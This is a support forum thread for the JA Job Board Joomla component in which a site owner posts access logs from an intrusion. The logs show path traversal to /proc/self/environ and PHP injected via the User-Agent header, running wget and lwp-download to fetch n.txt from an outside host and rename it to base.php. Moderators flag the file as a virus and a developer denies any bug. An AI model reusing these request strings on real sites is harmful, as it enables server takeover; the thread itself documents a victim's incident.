JA Job Board Component 8,554 posts

[kutu Friend kutuJoin date: March 2010Posts: 60Downloads:0Uploads:8 Thanks: 20 Thanked: 1 times in 1 posts]

#151286

Newley i realized unusual fiels in my root folder. Their names are base.txt and n.txt
After i asked my hosting company and i receved this log files.

74.7.241.42 – – [13/Apr/2010:22:34:32 +0300] “GET /index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1343 “-” “jcfs<?system(“lwp-download http://lnsshop.co .kr/n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:35:33 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1419 “-” “jcfs<?system(“id 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:59 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1368 “-” “jcfs<?system(“ls n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:38 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1763 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”
74.7.241.42 – – [13/Apr/2010:22:36:43 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1767 “-” “jcfs<?system(“wget http://lnsshop.co.kr/n.txt 2> /dev/stdout”); ?>jcfs”

So someone upload shell file to my root folder via jobboard then renamed n.txt file using ja jobboard? (as you see below)

74.7.241.42 – – [13/Apr/2010:22:37:18 +0300] “GET /jajobboard/index.php?option=com_jajobboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 1362 “-” “jcfs<?system(“mv n.txt base.php 2> /dev/stdout”); ?>jcfs”

As a result this is enterprise paid component and how could be this kind of BUG?

[Arvind Chauhan Moderator Arvind ChauhanJoin date: September 2014Posts: 3835Downloads:74Uploads:92 Thanks: 1240 Thanked: 1334 times in 848 posts]

#344549

Dear kutu,

The file n.txt is a virus and so i have unapproved the attachment. Will it be possible for you to send the complete logs you have recieved from the hosting company. That might help in assessing the situation.

This post has been flagged to the devs.

Arvind

[kutu Friend kutuJoin date: March 2010Posts: 60Downloads:0Uploads:8 Thanks: 20 Thanked: 1 times in 1 posts]

#344567

Do you want the all day logs that uploaded txt file? I just get this logs which are related to txt file from hosting company.
Would you describe exactly which log records?

[Anonymous Moderator JA DeveloperJoin date: September 2014Posts: 9914Downloads:207Uploads:152 Thanks: 1789 Thanked: 2008 times in 1700 posts]

#344648

<em>@kutu 179797 wrote:</em><blockquote>Do you want the all day logs that uploaded txt file? I just get this logs which are related to txt file from hosting company.
Would you describe exactly which log records?</blockquote>

Hi Kutu,

I would like to clarify that all the links in your log file are trying to steal account stored in server. Thus, your server should be configured to prevent outside form such an attack.

I already checked all the links and could see that JAJobboard have no error causing gaps in helping hacker make this during running component.

Kindly check and get back to us for any information.

[Author]

Posts